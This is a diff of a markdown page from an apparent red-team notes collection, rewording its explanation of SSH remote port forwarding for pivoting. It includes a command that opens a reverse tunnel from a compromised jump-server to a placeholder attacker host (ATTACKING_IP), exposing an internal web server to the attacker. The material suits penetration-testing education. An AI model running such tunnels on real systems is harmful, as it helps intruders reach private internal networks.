v4resk/red-book/redteam/pivoting/portfwd.md

 {% tab title="SSH Remote-Forwarding" %}
 **Remote port forwarding** allows a client machine of an SSH connection to redirect one of its ports to a port on the server, or to redirect a port of a network machine from the SSH server to a port local to the server.

-We can,for example, on a compromised computer (jump-server) connect back to the attackbox with a reverse port forward using the following command.
-This example produce the same result as previously seen with Local-Forwarding.
+On a compromised computer (jump-server), we can connect back to the attackbox with a reverse port forward using the following command, this example produce the same result as previously seen with Local-Forwarding.
 Any connection on `ATTACKING_IP:8000` will be redirected on `intra.example.com:80`

 ```bash
 PC> ssh -R 8000:intra.example.com:80 tunneluser@ATTACKING_IP -fN